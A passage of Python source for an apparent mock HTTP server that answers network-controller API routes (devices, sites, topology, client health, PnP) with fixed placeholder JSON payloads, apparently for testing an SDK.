    payload = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
    # Status line and headers go out before the body.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(payload.encode('utf-8'))
def matches_DEVICES_b888792d43baba46(self):
    """Match self.path against the DEVICES b888792d43baba46 route pattern; return the re.Match or None."""
    return re.search(self.DEVICES_b888792d43baba46_PATTERN, self.path)
def devices_get_interfaceby_id_response(self):
    """Serve the mocked get-interface-by-id payload: HTTP 200 with a JSON body."""
    payload = json.dumps({'response': {'adminStatus': 'string', 'className': 'string', 'description': 'string', 'deviceId': 'string', 'duplex': 'string', 'id': 'string', 'ifIndex': 'string', 'instanceTenantId': 'string', 'instanceUuid': 'string', 'interfaceType': 'string', 'ipv4Address': 'string', 'ipv4Mask': 'string', 'isisSupport': 'string', 'lastUpdated': 'string', 'macAddress': 'string', 'mappedPhysicalInterfaceId': 'string', 'mappedPhysicalInterfaceName': 'string', 'mediaType': 'string', 'nativeVlanId': 'string', 'ospfSupport': 'string', 'pid': 'string', 'portMode': 'string', 'portName': 'string', 'portType': 'string', 'serialNo': 'string', 'series': 'string', 'speed': 'string', 'status': 'string', 'vlanId': 'string', 'voiceVlan': 'string'}, 'version': 'string'})
    # Status line and headers go out before the body.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(payload.encode('utf-8'))
def matches_DEVICES_c3b3c9ef4e6b8a09(self):
    """Match self.path against the DEVICES c3b3c9ef4e6b8a09 route pattern; return the re.Match or None."""
    return re.search(self.DEVICES_c3b3c9ef4e6b8a09_PATTERN, self.path)
def devices_get_functional_capabilityfordevices_response(self):
    """Serve the mocked functional-capability payload: HTTP 200 with a JSON body."""
    payload = json.dumps({'response': [{'attributeInfo': {}, 'deviceId': 'string', 'functionalCapability': [{'attributeInfo': {}, 'functionDetails': [{'attributeInfo': {}, 'id': 'string', 'propertyName': 'string', 'stringValue': 'string'}], 'functionName': 'string', 'functionOpState': 'UNKNOWN', 'id': 'string'}], 'id': 'string'}], 'version': 'string'})
    # Status line and headers go out before the body.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(payload.encode('utf-8'))
def matches_DEVICES_89b2fb144f5bb09b(self):
    """Match self.path against the DEVICES 89b2fb144f5bb09b route pattern; return the re.Match or None."""
    return re.search(self.DEVICES_89b2fb144f5bb09b_PATTERN, self.path)
def devices_get_device_detail_response(self):
    """Serve the mocked device-detail payload: HTTP 200 with a JSON body."""
    payload = json.dumps({'response': {'HALastResetReason': 'string', 'managementIpAddr': 'string', 'HAPrimaryPowerStatus': 'string', 'redundancyMode': 'string', 'communicationState': 'string', 'nwDeviceName': 'string', 'redundancyUnit': 'string', 'platformId': 'string', 'redundancyPeerState': 'string', 'nwDeviceId': 'string', 'redundancyState': 'string', 'nwDeviceRole': 'string', 'nwDeviceFamily': 'string', 'macAddress': 'string', 'collectionStatus': 'string', 'deviceSeries': 'string', 'osType': 'string', 'clientCount': 'string', 'HASecondaryPowerStatus': 'string', 'softwareVersion': 'string', 'nwDeviceType': 'string', 'overallHealth': 0, 'memoryScore': 0, 'cpuScore': 0, 'noiseScore': 0, 'utilizationScore': 0, 'airQualityScore': 0, 'interferenceScore': 0, 'wqeScore': 0, 'freeMbufScore': 0, 'packetPoolScore': 0, 'freeTimerScore': 0, 'memory': 'string', 'cpu': 'string', 'noise': 'string', 'utilization': 'string', 'airQuality': 'string', 'interference': 'string', 'wqe': 'string', 'freeMbuf': 'string', 'packetPool': 'string', 'freeTimer': 'string', 'location': 'string', 'timestamp': 'string'}})
    # Status line and headers go out before the body.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(payload.encode('utf-8'))
def matches_DEVICES_f49548c54be8a3e2(self):
    """Match self.path against the DEVICES f49548c54be8a3e2 route pattern; return the re.Match or None."""
    return re.search(self.DEVICES_f49548c54be8a3e2_PATTERN, self.path)
def devices_get_network_devicebypaginationrange_response(self):
    """Serve the mocked network-device-by-pagination-range payload: HTTP 200 with a JSON body."""
    payload = json.dumps({'response': [{'apManagerInterfaceIp': 'string', 'associatedWlcIp': 'string', 'bootDateTime': 'string', 'collectionInterval': 'string', 'collectionStatus': 'string', 'errorCode': 'string', 'errorDescription': 'string', 'family': 'string', 'hostname': 'string', 'id': 'string', 'instanceTenantId': 'string', 'instanceUuid': 'string', 'interfaceCount': 'string', 'inventoryStatusDetail': 'string', 'lastUpdateTime': 'string', 'lastUpdated': 'string', 'lineCardCount': 'string', 'lineCardId': 'string', 'location': 'string', 'locationName': 'string', 'macAddress': 'string', 'managementIpAddress': 'string', 'memorySize': 'string', 'platformId': 'string', 'reachabilityFailureReason': 'string', 'reachabilityStatus': 'string', 'role': 'string', 'roleSource': 'string', 'serialNumber': 'string', 'series': 'string', 'snmpContact': 'string', 'snmpLocation': 'string', 'softwareType': 'string', 'softwareVersion': 'string', 'tagCount': 'string', 'tunnelUdpPort': 'string', 'type': 'string', 'upTime': 'string', 'waasDeviceMode': 'string'}], 'version': 'string'})
    # Status line and headers go out before the body.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(payload.encode('utf-8'))
def matches_DEVICES_ffa748cc44e9a437(self):
    """Match self.path against the DEVICES ffa748cc44e9a437 route pattern; return the re.Match or None."""
    return re.search(self.DEVICES_ffa748cc44e9a437_PATTERN, self.path)
def devices_retrievesallnetworkdevices_response(self):
    """Serve the mocked retrieve-all-network-devices payload: HTTP 200 with an empty JSON object."""
    payload = json.dumps({})
    # Status line and headers go out before the body.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(payload.encode('utf-8'))
def matches_SITES_17a82ac94cf99ab0(self):
    """Match self.path against the SITES 17a82ac94cf99ab0 route pattern; return the re.Match or None."""
    return re.search(self.SITES_17a82ac94cf99ab0_PATTERN, self.path)
def sites_get_site_health_response(self):
    """Serve the mocked site-health payload: HTTP 200 with a JSON body."""
    payload = json.dumps({'response': [{'siteName': 'string', 'siteId': 'string', 'parentSiteId': 'string', 'parentSiteName': 'string', 'siteType': 'string', 'latitude': {}, 'longitude': {}, 'healthyNetworkDevicePercentage': 'string', 'healthyClientsPercentage': 'string', 'clientHealthWired': 'string', 'clientHealthWireless': {}, 'numberOfClients': 'string', 'clientNumberOfIssues': {}, 'networkNumberOfIssues': {}, 'numberOfNetworkDevice': 'string', 'networkHealthAverage': {}, 'networkHealthAccess': 'string', 'networkHealthCore': 'string', 'networkHealthDistribution': 'string', 'networkHealthRouter': 'string', 'networkHealthWireless': {}, 'networkHealthOthers': {}, 'numberOfWiredClients': 'string', 'numberOfWirelessClients': {}, 'wiredGoodClients': 'string', 'wirelessGoodClients': {}, 'clientIssueCount': {}, 'overallGoodDevices': 'string', 'accessGoodCount': 'string', 'accessTotalCount': 'string', 'coreGoodCount': 'string', 'coreTotalCount': 'string', 'distributionGoodCount': 'string', 'distributionTotalCount': 'string', 'routerGoodCount': 'string', 'routerTotalCount': 'string', 'wirelessDeviceGoodCount': 'string', 'wirelessDeviceTotalCount': 'string', 'applicationHealth': {}, 'applicationGoodCount': {}, 'applicationTotalCount': {}, 'applicationBytesTotalCount': {}}]})
    # Status line and headers go out before the body.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(payload.encode('utf-8'))
def matches_SITES_33aab9b842388023(self):
    """Match self.path against the SITES 33aab9b842388023 route pattern; return the re.Match or None."""
    return re.search(self.SITES_33aab9b842388023_PATTERN, self.path)
def sites_update_site_response(self):
    """Serve the mocked update-site payload: HTTP 200 with a JSON body."""
    payload = json.dumps({'result': 'string', 'response': {'endTime': 'string', 'version': 'string', 'startTime': 'string', 'progress': 'string', 'data': 'string', 'serviceType': 'string', 'operationIdList': ['string'], 'isError': 'string', 'rootId': 'string', 'instanceTenantId': 'string', 'id': 'string'}, 'status': 'string'})
    # Status line and headers go out before the body.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(payload.encode('utf-8'))
def matches_SITES_23896b124bd8b9bf(self):
    """Match self.path against the SITES 23896b124bd8b9bf route pattern; return the re.Match or None."""
    return re.search(self.SITES_23896b124bd8b9bf_PATTERN, self.path)
def sites_create_site_response(self):
    """Serve the mocked create-site payload: HTTP 200 with a JSON body."""
    payload = json.dumps({'executionId': 'string', 'executionStatusUrl': 'string', 'message': 'string'})
    # Status line and headers go out before the body.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(payload.encode('utf-8'))
def matches_SITES_209509d247599e19(self):
    """Match self.path against the SITES 209509d247599e19 route pattern; return the re.Match or None."""
    return re.search(self.SITES_209509d247599e19_PATTERN, self.path)
def sites_get_site_response(self):
    """Serve the mocked get-site payload: HTTP 200 with a JSON body."""
    payload = json.dumps({'status': 'string', 'response': [{'parentId': 'string', 'systemGroup': 'string', 'name': 'string', 'groupTypeList': ['string'], 'additionalInfo': [{}], 'groupHierarchy': 'string', 'groupNameHierarchy': 'string', 'instanceTenantId': 'string', 'id': 'string'}]})
    # Status line and headers go out before the body.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(payload.encode('utf-8'))
def matches_SITES_92acda91406aa050(self):
    """Match self.path against the SITES 92acda91406aa050 route pattern; return the re.Match or None."""
    return re.search(self.SITES_92acda91406aa050_PATTERN, self.path)
def sites_delete_site_response(self):
    """Serve the mocked delete-site payload: HTTP 200 with a JSON body."""
    payload = json.dumps({'status': 'string', 'message': 'string'})
    # Status line and headers go out before the body.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(payload.encode('utf-8'))
def matches_SITES_d9bdb9034df99dba(self):
    """Match self.path against the SITES d9bdb9034df99dba route pattern; return the re.Match or None."""
    return re.search(self.SITES_d9bdb9034df99dba_PATTERN, self.path)
def sites_get_site_count_response(self):
    """Serve the mocked site-count payload: HTTP 200 with a JSON body."""
    payload = json.dumps({'response': 'string', 'version': 'string'})
    # Status line and headers go out before the body.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(payload.encode('utf-8'))
def matches_SITES_eeb168eb41988e07(self):
    """Match self.path against the SITES eeb168eb41988e07 route pattern; return the re.Match or None."""
    return re.search(self.SITES_eeb168eb41988e07_PATTERN, self.path)
def sites_assign_device_to_site_response(self):
    """Serve the mocked assign-device-to-site payload: HTTP 200 with a JSON body."""
    payload = json.dumps({'executionId': 'string', 'executionStatusUrl': 'string', 'message': 'string'})
    # Status line and headers go out before the body.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(payload.encode('utf-8'))
def matches_SITES_eba669054e08a60e(self):
    """Match self.path against the SITES eba669054e08a60e route pattern; return the re.Match or None."""
    return re.search(self.SITES_eba669054e08a60e_PATTERN, self.path)
def sites_get_membership_response(self):
    """Serve the mocked get-membership payload: HTTP 200 with a JSON body."""
    payload = json.dumps({'site': {'response': {}, 'version': 'string'}, 'device': {'response': {}, 'version': 'string'}})
    # Status line and headers go out before the body.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(payload.encode('utf-8'))
def matches_NETWORKS_6284db4649aa8d31(self):
    """Match self.path against the NETWORKS 6284db4649aa8d31 route pattern; return the re.Match or None."""
    return re.search(self.NETWORKS_6284db4649aa8d31_PATTERN, self.path)
def networks_get_vlandetails_response(self):
    """Serve the mocked VLAN-details payload: HTTP 200 with a JSON body."""
    payload = json.dumps({'response': ['string'], 'version': 'string'})
    # Status line and headers go out before the body.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(payload.encode('utf-8'))
def matches_NETWORKS_9ba14a9e441b8a60(self):
    """Match self.path against the NETWORKS 9ba14a9e441b8a60 route pattern; return the re.Match or None."""
    return re.search(self.NETWORKS_9ba14a9e441b8a60_PATTERN, self.path)
def networks_get_site_topology_response(self):
    """Serve the mocked site-topology payload: HTTP 200 with a JSON body."""
    payload = json.dumps({'response': {'sites': [{'displayName': 'string', 'groupNameHierarchy': 'string', 'id': 'string', 'latitude': 'string', 'locationAddress': 'string', 'locationCountry': 'string', 'locationType': 'string', 'longitude': 'string', 'name': 'string', 'parentId': 'string'}]}, 'version': 'string'})
    # Status line and headers go out before the body.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(payload.encode('utf-8'))
def matches_NETWORKS_b2b8cb91459aa58f(self):
    """Match self.path against the NETWORKS b2b8cb91459aa58f route pattern; return the re.Match or None."""
    return re.search(self.NETWORKS_b2b8cb91459aa58f_PATTERN, self.path)
def networks_get_physical_topology_response(self):
    """Serve the mocked physical-topology payload: HTTP 200 with a JSON body."""
    payload = json.dumps({'response': {'id': 'string', 'links': [{'additionalInfo': {}, 'endPortID': 'string', 'endPortIpv4Address': 'string', 'endPortIpv4Mask': 'string', 'endPortName': 'string', 'endPortSpeed': 'string', 'greyOut': True, 'id': 'string', 'linkStatus': 'string', 'source': 'string', 'startPortID': 'string', 'startPortIpv4Address': 'string', 'startPortIpv4Mask': 'string', 'startPortName': 'string', 'startPortSpeed': 'string', 'tag': 'string', 'target': 'string'}], 'nodes': [{'aclApplied': True, 'additionalInfo': {}, 'customParam': {'id': 'string', 'label': 'string', 'parentNodeId': 'string', 'x': 0, 'y': 0}, 'dataPathId': 'string', 'deviceType': 'string', 'family': 'string', 'fixed': True, 'greyOut': True, 'id': 'string', 'ip': 'string', 'label': 'string', 'networkType': 'string', 'nodeType': 'string', 'order': 0, 'osType': 'string', 'platformId': 'string', 'role': 'string', 'roleSource': 'string', 'softwareVersion': 'string', 'tags': ['string'], 'upperNode': 'string', 'userId': 'string', 'vlanId': 'string', 'x': 0, 'y': 0}]}, 'version': 'string'})
    # Status line and headers go out before the body.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(payload.encode('utf-8'))
def matches_NETWORKS_b9b48ac8463a8aba(self):
    """Match self.path against the NETWORKS b9b48ac8463a8aba route pattern; return the re.Match or None."""
    return re.search(self.NETWORKS_b9b48ac8463a8aba_PATTERN, self.path)
def networks_gettopologydetails_response(self):
    """Serve the mocked topology-details payload: HTTP 200 with a JSON body."""
    payload = json.dumps({'response': {'id': 'string', 'links': [{'additionalInfo': {}, 'endPortID': 'string', 'endPortIpv4Address': 'string', 'endPortIpv4Mask': 'string', 'endPortName': 'string', 'endPortSpeed': 'string', 'greyOut': True, 'id': 'string', 'linkStatus': 'string', 'source': 'string', 'startPortID': 'string', 'startPortIpv4Address': 'string', 'startPortIpv4Mask': 'string', 'startPortName': 'string', 'startPortSpeed': 'string', 'tag': 'string', 'target': 'string'}], 'nodes': [{'aclApplied': True, 'additionalInfo': {}, 'customParam': {'id': 'string', 'label': 'string', 'parentNodeId': 'string', 'x': 0, 'y': 0}, 'dataPathId': 'string', 'deviceType': 'string', 'family': 'string', 'fixed': True, 'greyOut': True, 'id': 'string', 'ip': 'string', 'label': 'string', 'networkType': 'string', 'nodeType': 'string', 'order': 0, 'osType': 'string', 'platformId': 'string', 'role': 'string', 'roleSource': 'string', 'softwareVersion': 'string', 'tags': ['string'], 'upperNode': 'string', 'userId': 'string', 'vlanId': 'string', 'x': 0, 'y': 0}]}, 'version': 'string'})
    # Status line and headers go out before the body.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(payload.encode('utf-8'))
def matches_NETWORKS_c2b5fb764d888375(self):
    """Match self.path against the NETWORKS c2b5fb764d888375 route pattern; return the re.Match or None."""
    return re.search(self.NETWORKS_c2b5fb764d888375_PATTERN, self.path)
def networks_get_l3_topology_details_response(self):
    """Serve the mocked L3-topology-details payload: HTTP 200 with a JSON body."""
    payload = json.dumps({'response': {'id': 'string', 'links': [{'additionalInfo': {}, 'endPortID': 'string', 'endPortIpv4Address': 'string', 'endPortIpv4Mask': 'string', 'endPortName': 'string', 'endPortSpeed': 'string', 'greyOut': True, 'id': 'string', 'linkStatus': 'string', 'source': 'string', 'startPortID': 'string', 'startPortIpv4Address': 'string', 'startPortIpv4Mask': 'string', 'startPortName': 'string', 'startPortSpeed': 'string', 'tag': 'string', 'target': 'string'}], 'nodes': [{'aclApplied': True, 'additionalInfo': {}, 'customParam': {'id': 'string', 'label': 'string', 'parentNodeId': 'string', 'x': 0, 'y': 0}, 'dataPathId': 'string', 'deviceType': 'string', 'family': 'string', 'fixed': True, 'greyOut': True, 'id': 'string', 'ip': 'string', 'label': 'string', 'networkType': 'string', 'nodeType': 'string', 'order': 0, 'osType': 'string', 'platformId': 'string', 'role': 'string', 'roleSource': 'string', 'softwareVersion': 'string', 'tags': ['string'], 'upperNode': 'string', 'userId': 'string', 'vlanId': 'string', 'x': 0, 'y': 0}]}, 'version': 'string'})
    # Status line and headers go out before the body.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(payload.encode('utf-8'))
def matches_NETWORKS_ca91da84401abba1(self):
    """Match self.path against the NETWORKS ca91da84401abba1 route pattern; return the re.Match or None."""
    return re.search(self.NETWORKS_ca91da84401abba1_PATTERN, self.path)
def networks_get_overall_network_health_response(self):
    """Serve the mocked overall-network-health payload: HTTP 200 with a JSON body."""
    payload = json.dumps({'version': 'string', 'response': [{'time': 'string', 'healthScore': 0, 'totalCount': 0, 'goodCount': 0, 'unmonCount': 0, 'fairCount': 0, 'badCount': 0, 'entity': {}, 'timeinMillis': 0}], 'measuredBy': 'string', 'latestMeasuredByEntity': {}, 'latestHealthScore': 0, 'monitoredDevices': 0, 'monitoredHealthyDevices': 0, 'monitoredUnHealthyDevices': 0, 'unMonitoredDevices': 0, 'healthDistirubution': [{'category': 'string', 'totalCount': 0, 'healthScore': 0, 'goodPercentage': 0, 'badPercentage': 0, 'fairPercentage': 0, 'unmonPercentage': 0, 'goodCount': 0, 'badCount': 0, 'fairCount': 0, 'unmonCount': 0, 'kpiMetrics': [{}]}]})
    # Status line and headers go out before the body.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(payload.encode('utf-8'))
def matches_CLIENTS_149aa93b4ddb80dd(self):
    """Match self.path against the CLIENTS 149aa93b4ddb80dd route pattern; return the re.Match or None."""
    return re.search(self.CLIENTS_149aa93b4ddb80dd_PATTERN, self.path)
def clients_get_overall_client_health_response(self):
    """Serve the mocked overall-client-health payload: HTTP 200 with a JSON body."""
    payload = json.dumps({'response': [{'siteId': 'string', 'scoreDetail': [{'scoreCategory': {'scoreCategory': 'string', 'value': 'string'}, 'scoreValue': 0, 'clientCount': 0, 'clientUniqueCount': 0, 'starttime': 0, 'endtime': 0, 'scoreList': [{'scoreCategory': {'scoreCategory': 'string', 'value': 'string'}, 'scoreValue': 0, 'clientCount': 0, 'clientUniqueCount': 0, 'starttime': 0, 'endtime': 0, 'scoreList': [{'scoreCategory': {'scoreCategory': 'string', 'value': 'string'}, 'scoreValue': 0, 'clientCount': 0, 'clientUniqueCount': {}, 'starttime': 0, 'endtime': 0}]}]}]}]})
    # Status line and headers go out before the body.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(payload.encode('utf-8'))
def matches_CLIENTS_e2adba7943bab3e9(self):
    """Match self.path against the CLIENTS e2adba7943bab3e9 route pattern; return the re.Match or None."""
    return re.search(self.CLIENTS_e2adba7943bab3e9_PATTERN, self.path)
def clients_get_client_detail_response(self):
    """Serve the mocked client-detail payload: HTTP 200 with a JSON body."""
    payload = json.dumps({'detail': {'id': 'string', 'connectionStatus': 'string', 'hostType': 'string', 'userId': {}, 'hostName': 'string', 'hostOs': {}, 'hostVersion': {}, 'subType': 'string', 'lastUpdated': 0, 'healthScore': [{'healthType': 'string', 'reason': 'string', 'score': 0}], 'hostMac': 'string', 'hostIpV4': 'string', 'hostIpV6': ['string'], 'authType': 'string', 'vlanId': 'string', 'vnid': 'string', 'ssid': 'string', 'frequency': 'string', 'channel': 'string', 'apGroup': {}, 'location': {}, 'clientConnection': 'string', 'connectedDevice': [{}], 'issueCount': 0, 'rssi': 'string', 'avgRssi': {}, 'snr': 'string', 'avgSnr': {}, 'dataRate': 'string', 'txBytes': 'string', 'rxBytes': 'string', 'dnsSuccess': {}, 'dnsFailure': {}, 'onboarding': {'averageRunDuration': {}, 'maxRunDuration': {}, 'averageAssocDuration': {}, 'maxAssocDuration': {}, 'averageAuthDuration': {}, 'maxAuthDuration': {}, 'averageDhcpDuration': {}, 'maxDhcpDuration': {}, 'aaaServerIp': 'string', 'dhcpServerIp': {}, 'authDoneTime': {}, 'assocDoneTime': {}, 'dhcpDoneTime': {}, 'assocRootcauseList': [{}], 'aaaRootcauseList': [{}], 'dhcpRootcauseList': [{}], 'otherRootcauseList': [{}]}, 'clientType': 'string', 'onboardingTime': {}, 'port': {}, 'iosCapable': True}, 'connectionInfo': {'hostType': 'string', 'nwDeviceName': 'string', 'nwDeviceMac': 'string', 'protocol': 'string', 'band': 'string', 'spatialStream': 'string', 'channel': 'string', 'channelWidth': 'string', 'wmm': 'string', 'uapsd': 'string', 'timestamp': 0}, 'topology': {'nodes': [{'role': 'string', 'name': 'string', 'id': 'string', 'description': 'string', 'deviceType': 'string', 'platformId': {}, 'family': {}, 'ip': 'string', 'softwareVersion': {}, 'userId': {}, 'nodeType': 'string', 'radioFrequency': {}, 'clients': {}, 'count': {}, 'healthScore': 0, 'level': 0, 'fabricGroup': {}, 'connectedDevice': {}}], 'links': [{'source': 'string', 'linkStatus': 'string', 'label': ['string'], 'target': 'string', 'id': {}, 'portUtilization': {}}]}})
    # Status line and headers go out before the body.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(payload.encode('utf-8'))
def matches_PNP_0b836b7b4b6a9fd5(self):
    """Match self.path against the PNP 0b836b7b4b6a9fd5 route pattern; return the re.Match or None."""
    return re.search(self.PNP_0b836b7b4b6a9fd5_PATTERN, self.path)
def pnp_un_claim_device_response(self):
    """Serve the mocked PnP unclaim-device payload: HTTP 200 with a JSON body."""
    payload = json.dumps({'jsonArrayResponse': [{}], 'jsonResponse': {}, 'message': 'string', 'statusCode': 0})
    # Status line and headers go out before the body.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(payload.encode('utf-8'))
def matches_PNP_0a9c988445cb91c8(self):
    """Match self.path against the PNP 0a9c988445cb91c8 route pattern; return the re.Match or None."""
    return re.search(self.PNP_0a9c988445cb91c8_PATTERN, self.path)
def pnp_get_sync_resultfor_virtual_account_response(self):
    """Serve the mocked virtual-account sync-result payload: HTTP 200 with a JSON body."""
    payload = json.dumps({'virtualAccountId': 'string', 'autoSyncPeriod': 0, 'syncResultStr': 'string', 'profile': {'proxy': True, 'makeDefault': True, 'port': 0, 'profileId': 'string', 'name': 'string', 'addressIpV4': 'string', 'cert': 'string', 'addressFqdn': 'string'}, 'ccoUser': 'string', 'syncResult': {'syncList': [{'syncType': 'string', 'deviceSnList': ['string']}], 'syncMsg': 'string'}, 'token': 'string', 'syncStartTime': 0, 'lastSync': 0, 'tenantId': 'string', 'smartAccountId': 'string', 'expiry': 0, 'syncStatus': 'string'})
    # Status line and headers go out before the body.
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(payload.encode('utf-8'))
def matches_PNP_09b0f9ce4239ae10(self):
    """Match self.path against the PNP 09b0f9ce4239ae10 route pattern; return the re.Match or None."""
    return re.search(self.PNP_09b0f9ce4239ae10_PATTERN, self.path)
def pnp_update_device_response(self):
    """Serve the mocked PnP update-device payload: HTTP 200 with a JSON body."""
    payload = json.dumps({'_id': 'string', 'deviceInfo': {'source': 'string', 'serialNumber': 'string', 'stack': True, 'mode': 'string', 'state': 'string', 'location': {'siteId': 'string', 'address': 'string', 'latitude': 'string', 'longitude': 'string', 'altitude': 'string'}, 'description': 'string', 'onbState': 'string', 'authenticatedMicNumber': 'string', 'authenticatedSudiSerialNo': 'string', 'capabilitiesSupported': ['string'], 'featuresSupported': ['string'], 'cmState': 'string', 'firstContact': 0, 'lastContact': 0, 'macAddress': 'string', 'pid': 'string', 'deviceSudiSerialNos': ['string'], 'lastUpdateOn': 0, 'workflowId': 'string', 'workflowName': 'string', 'projectId': 'string', 'projectName': 'string', 'deviceType': 'string', 'agentType': 'string', 'imageVersion': 'string', 'fileSystemList': [{'type': 'string', 'writeable': True, 'freespace': 0, 'name': 'string', 'readable': True, 'size': 0}], 'pnpProfileList': [{'profileName': 'string', 'discoveryCreated': True, 'createdBy': 'string', 'primaryEndpoint': {'port': 0, 'protocol': 'string', 'ipv4Address': {}, 'ipv6Address': {}, 'fqdn': 'string', 'certificate': 'string'}, 'secondaryEndpoint': {'port': 0, 'protocol': 'string', 'ipv4Address': {}, 'ipv6Address': {}, 'fqdn': 'string', 'certificate': 'string'}}], 'imageFile': 'string', 'httpHeaders': [{'key': 'string', 'value': 'string'}], 'neighborLinks': [{'localInterfaceName': 'string', 'localShortInterfaceName': 'string', 'localMacAddress': 'string', 'remoteInterfaceName': 'string', 'remoteShortInterfaceName': 'string', 'remoteMacAddress': 'string', 'remoteDeviceName': 'string', 'remotePlatform': 'string', 'remoteVersion': 'string'}], 'lastSyncTime': 0, 'ipInterfaces': [{'status': 'string', 'macAddress': 'string', 'ipv4Address': {}, 'ipv6AddressList': [{}], 'name': 'string'}], 'hostname': 'string', 'authStatus': 'string', 'stackInfo': {'supportsStackWorkflows': True, 'isFullRing': True, 'stackMemberList': [{'serialNumber': 'string', 'state': 'string', 'role': 'string', 'macAddress': 'string', 'pid': 'string', 'licenseLevel': 'string', 'licenseType': 'string', 'sudiSerialNumber': 'string', 'hardwareVersion': 'string', 'stackNumber': 0, 'softwareVersion': 'string', 'priority': 0}], 'stackRingProtocol': 'string', 'validLicenseLevels': ['string'], 'totalMemberCount': 0}, 'reloadRequested': True, 'addedOn': 0, 'siteId': 'string', 'aaaCredentials': {'password': 'string', 'username': 'string'}, 'userMicNumbers': ['string'], 'userSudiSerialNos': ['string'], 'addnMacAddrs': ['string'], 'preWorkflowCliOuputs': [{'cli': 'string', 'cliOutput': 'string'}], 'tags': {}, 'sudiRequired': True, 'smartAccountId': 'string', 'virtualAccountId': 'string', 'populateInventory': True, 'siteName': 'string', 'name': 'string'}, 'systemResetWorkflow': {'_id': 'string', 'state': 'string', 'type': 'string', 'description': 'string', 'lastupdateOn': 0, 'imageId': 'string', 'currTaskIdx': 0, 'addedOn': 0, 'tasks': [{'state': 'string', 'type': 'string', 'currWorkItemIdx': 0, 'taskSeqNo': 0, 'endTime': 0, 'startTime': 0, 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'name': 'string'}], 'addToInventory': True, 'instanceType': 'string', 'endTime': 0, 'execTime': 0, 'startTime': 0, 'useState': 'string', 'configId': 'string', 'name': 'string', 'version': 0, 'tenantId': 'string'}, 'systemWorkflow': {'_id': 'string', 'state': 'string', 'type': 'string', 'description': 'string', 'lastupdateOn': 0, 'imageId': 'string', 'currTaskIdx': 0, 'addedOn': 0, 'tasks': [{'state': 'string', 'type': 'string', 'currWorkItemIdx': 0, 'taskSeqNo': 0, 'endTime': 0, 'startTime': 0, 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'name': 'string'}], 'addToInventory': True, 'instanceType': 'string', 'endTime': 0, 'execTime': 0, 'startTime': 0, 'useState': 'string', 'configId': 'string', 'name': 'string', 'version': 0, 'tenantId': 'string'}, 'workflow': {'_id': 'string', 'state': 'string', 'type': 'string', 'description': 'string', 'lastupdateOn': 0, 'imageId': 'string', 'currTaskIdx': 0, 'addedOn': 0, 'tasks': [{'state': 'string', 'type': 'string', 'currWorkItemIdx': 0, 'taskSeqNo': 0, 'endTime': 0, 'startTime': 0, 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'name': 'string'}], 'addToInventory': True, 'instanceType': 'string', 'endTime': 0, 'execTime': 0, 'startTime': 0, 'useState': 'string', 'configId': 'string', 'name': 'string', 'version': 0, 'tenantId': 'string'}, 'runSummaryList': [{'details': 'string', 'historyTaskInfo': {'type': 'string', 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'addnDetails': [{'key': 'string', 'value': 'string'}], 'name': 'string'}, 'errorFlag': True, 'timestamp': 0}], 'workflowParameters': {'topOfStackSerialNumber': 'string', 'licenseLevel': 'string', 